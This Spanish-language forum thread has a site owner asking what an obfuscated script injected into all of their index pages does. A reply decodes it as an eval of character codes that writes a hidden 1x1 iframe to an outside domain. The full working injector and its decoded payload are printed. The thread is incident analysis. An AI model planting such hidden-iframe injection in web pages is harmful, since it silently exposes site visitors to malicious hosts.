Buenas foreros. Me he encontrado con un ataque en mi web y ha sido que los archivos index.php e index.html de todas las carpetas tenian este script al final del code:
<b id="glavnoelubovz">St<i>ri</i>n<i>g|<i>sp<i>li<i>t|f<i>rom<i>Ch<i>a</i>rC</i>o</i>d</i>e</i>|</i>ev</i>al</b>
<script>
function glavnoelubovc(node) {
var ret = "";
for(var i=0; i<node.childNodes.length; i++) {
switch(node.childNodes[i].nodeType) {
case 1: ret+=glavnoelubovc(node.childNodes[i]); break;
case 3: ret+=node.childNodes[i].nodeValue;
}
}
return ret;
}
var glavnoelubov = glavnoelubovc(document.getElementById("glavnoelubovz")).split("|");
</script>
<script>
window[glavnoelubov[3]]("glavnoelubov_DGicyJZczU = "+glavnoelubov[0]);
var glavnoelubov_pioRCoumcR = " a 100 a 111 a 99 a 117 a 109 a 101 a 110 a 116 a 46 a 119 a 114 a 105 a 116 a 101 a 40 a 34 a 60 a 105 a 102 a 114 a 97 a 109 a 101 a 32 a 115 a 114 a 99 a 61 a 39 a 104 a 116 a 116 a 112 a 58 a 47 a 47 a 117 a 105 a 116 a 121 a 114 a 46 a 105 a 110 a 47 a 120 a 47 a 105 a 110 a 100 a 101 a 120 a 46 a 112 a 104 a 112 a 63 a 115 a 61 a 100 a 97 a 50 a 52 a 50 a 99 a 100 a 49 a 50 a 102 a 98 a 48 a 50 a 102 a 50 a 97 a 48 a 51 a 54 a 102 a 53 a 57 a 52 a 50 a 53 a 50 a 48 a 100 a 97 a 49 a 99 a 57 a 39 a 32 a 119 a 105 a 100 a 116 a 104 a 61 a 49 a 32 a 104 a 101 a 105 a 103 a 104 a 116 a 61 a 49 a 32 a 102 a 114 a 97 a 109 a 101 a 98 a 111 a 114 a 100 a 101 a 114 a 61 a 48 a 62 a 60 a 47 a 105 a 102 a 114 a 97 a 109 a 101 a 62 a 34 a 41 a 59";
var glavnoelubov_BKyPlsuSlj = glavnoelubov_pioRCoumcR[glavnoelubov[1]](" "+"a"+" ");
var glavnoelubov_ShdAeHXubi = "";
for (var glavnoelubov_lQQZiTNcFq=1; glavnoelubov_lQQZiTNcFq<glavnoelubov_BKyPlsuSlj.length; glavnoelubov_lQQZiTNcFq++){glavnoelubov_ShdAeHXubi+=glavnoelubov_DGicyJZczU[glavnoelubov[2]](glavnoelubov_BKyPlsuSlj[glavnoelubov_lQQZiTNcFq]);}
window[glavnoelubov[3]](glavnoelubov_ShdAeHXubi);
</script>
Alguien podria decirme que hace tal script?
Muchas gracias.
El primer Script, solo realiza un split a una cadena.
Cadena = String|split|fromCharCode|eval
Split = String,split,fromCharCode,eval
El segundo no lo sé, no lo vi :P
Después de hacer el split a la cadena de números, con " a ", pasa cada uno a su correspondiente ascii con fromCharCode y lo concatena. El resultado es el siguiente:
document.write("<iframe src='http://uityr.in/x/index.php?s=da242cd12fb02f2a036f5942520da1c9' width=1 height=1 frameborder=0></iframe>");
Se lo pasa a un eval() y se ejecuta...
No puedo decirte que hay en esa web porque me redirecciona a un 404, puede ser que ya hayan suspendido la página maliciosa, o que compruebe que el "Referrer" es de una página comprometida.
Saludos!
Cita de: cgvwzq en 6 Julio 2010, 15:20 PM
Después de hacer el split a la cadena de números, con " a ", pasa cada uno a su correspondiente ascii con fromCharCode y lo concatena. El resultado es el siguiente:
document.write("<iframe src='http://uityr.in/x/index.php?s=da242cd12fb02f2a036f5942520da1c9' width=1 height=1 frameborder=0></iframe>");
Se lo pasa a un eval() y se ejecuta...
No puedo decirte que hay en esa web porque me redirecciona a un 404, puede ser que ya hayan suspendido la página maliciosa, o que compruebe que el "Referrer" es de una página comprometida.
Saludos!
Te agradezco tu investigacion. Tampoco se que es lo que hay tras esa web pero si es cierto que el kaspersky me lo bloquea.